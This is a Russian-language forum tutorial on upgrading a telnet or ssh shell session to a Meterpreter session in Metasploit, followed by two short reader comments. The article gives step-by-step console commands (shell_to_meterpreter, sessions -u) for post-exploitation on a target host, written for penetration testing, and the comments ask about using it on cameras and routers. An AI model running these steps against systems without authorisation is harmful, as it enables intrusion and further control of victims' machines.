• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Статья Апгрейд shell'a до meterpreter

Приветствую.

В этой небольшой, но полезной статье, я хочу рассмотреть способ апгрейда сессии telnet или ssh до meterpreter.

Это позволит получить нам дополнительные возможности для проведения комплексного тестирования на проникновение. Дальше можно будет загружать файлы на уязвимую машину, попробовать сменить настройки файрволла, да и многое другое, на что способен meterpreter и ваш воспаленный мозг.

Итак, представим, что у нас имеется сессия telnet, мне представлять не нужно, в качестве атакующей системы Kali Linux 2016.2, эксплуатируемый хост Debian 8.6.

upload_2017-3-22_22-33-1.png


Запускаем Metasploit Framework, а затем:

> use auxiliary/scanner/telnet/telnet_login

> sessions

upload_2017-3-22_22-33-21.png


Видим, что тип нашей сессии – shell, попробуем изменить его на meterpreter, используя следующий модуль. Платформа оболочки автоматически определяется и выбирается лучшая версия meterpreter для цели:

> back

> use post/multi/manage/shell_to_meterpreter

> sessions

> set session 1

> exploit


upload_2017-3-22_22-34-5.png


Посмотрим, насколько нам удалось:

> sessions

upload_2017-3-22_22-34-23.png


Как видим, открылась вторая сессия, и она имеет тип meterpreter.

Переключимся на нее и посмотрим на работоспособность оной:

> sessions 2

> sysinfo

upload_2017-3-22_22-34-46.png


Все работает.

Есть еще вариант проделать тоже, но с помощью /scanner/telnet/telnet_login, вернемся к нему:

> back

> sessions

> session –h

> sessions –u 1


upload_2017-3-22_22-35-17.png


Проверим тип сессии:

> sessions

upload_2017-3-22_22-35-35.png


Использование функций модуля прошло, так же успешно, сессия работает корректно:

> sessions 3

> sysinfo


upload_2017-3-22_22-36-3.png


Спасибо за внимание, на этом все.
 
это работает только с ПК или со всякими ip камерами , роутерами и прочими никсовыми устройствами тоже прокатывает ?
 
Думаю прокатывает, еще попрактикуюсь
 
  • Нравится
Реакции: mz111
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы